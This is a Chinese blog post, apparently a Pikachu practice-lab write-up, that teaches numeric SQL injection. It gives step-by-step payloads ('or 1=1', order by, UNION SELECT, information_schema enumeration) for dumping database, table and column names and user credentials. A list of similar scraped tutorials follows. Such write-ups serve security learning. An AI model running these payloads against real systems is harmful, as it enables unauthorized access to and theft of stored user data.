SQL注入:数字型 pikachu

最新推荐文章于 2025-05-27 15:01:42 发布
最新推荐文章于 2025-05-27 15:01:42 发布
阅读量211 收藏
点赞数
CC 4.0 BY-SA版权
文章标签: 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_59607911/article/details/133814657
本文详细解释了SQL注入的原理,包括数字型注入案例,以及如何通过逻辑判断和使用information_schema进行库名、表名、字段名的探测,最终演示了如何利用SQL注入获取数据库内容的方法。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

SQL注入原理

select * from  users where  username = 'username', password = 'password' ;

修改后

select * from  users where  username = 'username ' or 1=1 --+', password = 'password' ;
 

一,数字型注入

查询语句:select id,email from member where username=$id

?id=1 or 1=1

?id=1 order by 3
?id=-1 union select 1,2,3
查库:

?id=-1 union select 1,user(),database()


查表:

?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'


查字段:

?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'


查内容:

?id=-1 union select 1,2,group_concat(username ,id , password) from users
 

(1)判断是否存在注入

注入点判断:

闭合符号判断:  ' " ) } %

逻辑判断: and 1=1  

         and 1=2  

         ?id=2-1

         or 1=1 --+

select username from user where id = '2-1'
 

 

(2)or 1=1(不用#,是因为不是字符型,后面没有') 

(3)查看select语句里面有多少字段 

 

 (4)最后检测有两个字段

 

(5) 查看两个字段的内容 

 

(6)查看 当前用户名,当前数据库名 

 

 二、利用:通过sql注入查看数据库里面的内容

 mysql数据库结构在:

information_schema: 

 

shcemata表(库)

tables表(表)

columns表(字段)

 1、 查库名:

union select 1,schema_name from information_schema.schemata limit 1,1 

 

2、查表名: (查当前mysql库里面有哪些表) 

 union select 1,table_name from information_schema.tables where table_schema = "mysql" limit 1,1

 

3、查字段名:(查当前mysql库,当前表user里面有哪些字段) 

 union select 1,column_name from information_schema.columns where table_name = "user" and table_schema="mysql" limit 1,1

 

4、排序查询字段名: 

union select 1,group_concat(column_name) from information_schema.columns where table_name='user'and table_schema='mysql' 

 

5、 爆破sql注入查询到的内容: 

 

 

 

sqli-labs全通关(1-75)之Less-1 GET - Error based - Single quotes - String
guanrongl的专栏
08-05 556
3、用 and ‘1’='1 和 and ‘1’='2来判断,1’ and ‘1’ = '1,页面运行正常,而1’ and ‘1’ = '2,页面运行错误,则说明此 Sql 注入为字符型注入。2、用 and 1=1 和 and 1=2 来判断,两者都能正常回显则是字符型注入,否则是数字型注入。1、用减法判断:利用id=2-1 如果返回的是id=1的结果,则是数字注入,否则是字符注入。id=1’ order by 3 --+ // --+ 是注释。当 id=2-1,得到结果为Angelina ,
SQL注入pikachu靶场中的SQL注入通关
qq_68163788的博客
05-24 4294
SQL注入是一种常见的网络攻击技术,攻击者利用应用程序对用户输入数据的处理不当,通过在输入字段中插入恶意的SQL代码,从而实现对数据库的非法访问和控制。通过成功利用SQL注入漏洞,攻击者可以执行未经授权的操作,如删除、修改或获取敏感数据。在pikachu靶场中,玩家需要利用自己的技能和知识,深入了解SQL注入的原理和方法,通过不断尝试和实践,最终成功通关。这个过程不仅可以帮助玩家提升对SQL注入漏洞的识别和防范能力,还能加深对网络安全的理解和认识。
Pikachu SQL注入数字型注入
SS_liang的博客
01-11 1809
我们在点击选择框里面的123456时,url没有变化,不是get请求,我们直接抓包试试:1. GET请求:GET请求用于从服务器获取资源,通过将参数附加在URL的末尾来传递数据。这些参数以键值对的形式出现在URL的查询字符串中,例如:http://example.com?GET请求的特点包括:- 数据以明文形式出现在URL中,可以被缓存、书签等记录。- 传输的数据量有限,受URL长度限制。- 数据通过URL传输,对于敏感信息不太安全。- GET请求可被浏览器主动缓存。
SQL 三种注入方式详解,(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
Javachichi的博客
05-27 3466
MySQL 提供了 load_file() 函数,可以帮助用户快速读取文件,但文件的位置必须在服务器上,文件必须为绝对路径,且用户必须有 FILE 权限,文件容量也必须小于 max_allowed_packet 字节 (默认为 16MB,最大为 1GB)。SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。
Pikachusql数字型注入
m0_63152656的博客
09-24 559
pikachusql数字型注入 及 终端打开小皮数据库
pikachu-数字型注入-sqlmap
bangyan3903的博客
08-12 647
题目链接:http://127.0.0.1/pikachu-master/vul/sqli/sqli_id.php 题目来源:pikachu-->SQL-inject-->数字型注入(post) 任意提交数据,使用bp抓包得到post方式提交的参数为 id=1&submit=%E6%9F%A5%E8%AF%A2 使用sqlmap跑post方式时的格式...
SQL注入pikachu靶场)(mysql数据库)数字型注入
weixin_54431413的博客
03-05 817
1.数字型注入 点击查询(submit),用burpsuite抓取请求(request)包 order by 判断有几列 union select 1,2 判断回显 然后利用mysql高版本中的默认库(information_schema)进行所有的数据库名查询 union select 1,schema_name from information_schema.schemata 根据得到的数据库名查询数据库下的表名 union select 1,table_name from .
sql注入 pikachu post数字型注入
08-12
SQL 注入 Pikachu Post 数字型注入 SQL 注入是一种常见的 Web 应用安全漏洞,攻击者可以通过在输入字段中注入恶意的 SQL 语句来获取或修改敏感数据。在本文中,我们将探讨一种新的 Post 数字型注入方法,即使用 ...
SQL注入数字型注入详解与实战
"SQL注入数字型注入" SQL注入是一种常见的网络安全漏洞,主要发生在Web应用程序中。当用户输入的数据未经适当过滤或验证就被直接用于构造SQL查询时,攻击者可以通过精心构造的输入,改变原本的查询逻辑,从而获取...
sql注入数字型注入
08-02
SQL 注入数字型注入 SQL 注入数字型注入是一种常见的 Web 应用安全漏洞,攻击者可以通过构造恶意输入来inject恶意 SQL 语句,访问或修改数据库中的敏感信息。本文将详细介绍数字型注入的概念、原理、检测方法和...
Pikachu-Sql Inject-数字型注入(GET)
guanrongl的专栏
10-03 657
测试。
重现pikachu sql数字型字符型注入(作业)
qq_43473164的博客
03-24 1157
重现pikachu sql数字型字符型注入 本周对于sql注入有了一定的了解,我亲自在pikachu上进行了实验,以下为我的实验内容 sql数字型注入 连接数据库,这里我直接使用phpstudy集成环境. 输入 select * username,email from member where id = 1 or 1 = 1 效果如下 很明显,条件恒为真,遍历出所有username 和 emai...
SQL注入数字型
Vi_vids的博客
10-20 2059
基本漏洞篇 SQL注入数字型SQL注入就是在网站中注入sql语句,使其可以显示一些有用敏感信息 本章描述的数字型即是注入点为数字,采用GET方式 //sql_num.php <?php $conn = mysql_connect('localhost:3306','root','123456')or die('bad!'); //$conn定义一个名字为conn的变量 //使用账号root密码123456 去连接localhost这个mysql服务 mysql_query("SET NAMES
sql注入--数字型
pakho_C的博客
01-01 2326
sql注入数字型 靶场:sqli-labs-master 下载链接:靶场下载链接 第二关php源码 <?php //including the Mysql connect parameters. include("../sql-connections/sql-connect.php"); error_reporting(0); // take the variables if(isset($_GET['id'])) { $id=$_GET['id']; //logging the connectio
pikachu~~~数字型&字符型注入
weixin_50339832的博客
05-17 527
让我们选择1-6的数字,并不能手动输入 选一个抓包 order by 判断有几列,发现没有第三列,那么查询语句只用了两个列名。 在后面加上 or 1=1,这样判断条件变成了永真,返回所有查询结果。 使用 union select database(),user() 爆破当前的数据名和当前的用户 union select TABLE_SCHEMA,table_name from information_schema.tables where table_schema=‘pikachu’ 根据数据库名查询数据
pikachu闯关(一)---数字型注入
weixin_75034911的博客
07-04 1299
pikachu中是通过单选下拉进行选择提交,可以通过html中下拉选择的节点,进行注入
pikachu靶场练习——数字型注入
tyelixy的博客
08-09 1903
burpsuite未安装完成,不涉及抓包相关内容 前置内容 由于网页的生成有时需要用到用户输入的信息,再根据用户输入到数据库中查找相关内容,所以网页中会含有sql语句。针对sql语句,可以进行sql注入。 如: $sql="SELECT * FROM news WHERE id={$id}"; 这样的语句可以进行数字型注入。 题目实战 打开靶场,选择sql数字型注入题,出现以下页面。 下拉栏中有选项 ---以及数字1~6。 选择数字一先发送个请求试试: 可以看到发送的表单中id:1 然后发现可以在检.
pikachu】-SQL注入数字型
vector的博客
03-02 613
1.首先判断是否有注入风险,有序输入方式是下拉列表,所以无法进行直接的输入改造,用bp抓包下来,在repeater中改包。 将id=1改成 id=1 and 1=2,服务器允许了这句sql执行,并且返回“输入id不存在”,说明存在sql注入的风险 2.现在构造语句,在repeater中改为 id=1 or 1=1,此时的搜索条件恒成立,因此可以返回表单中的所有内容 实验成功 ...
Pikachu靶场:SQL-Inject之数字型注入(post)
witwitwiter的博客
04-14 2907
Pikachu靶场:SQL-Inject之数字型注入(post) 实验环境以及工具 Firefox浏览器、Burp Suite、Pikachu靶场 实验原理 数据库注入漏洞,主要是开发人员在构建代码时,没有对输入边界进行安全考虑,导致攻击着可以通过合法的输入点提交一些精心构造的语句,从而欺骗后台数据库对其进行执行,导致数据库信息泄漏的一种漏洞。 实验步骤 1.前期工作 先将Proxy中的intercept关闭,使其不进行拦截,让数据通过监听的端口。 2.注入点探测 在数字型注入中只看到一个下拉框,里面包含
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值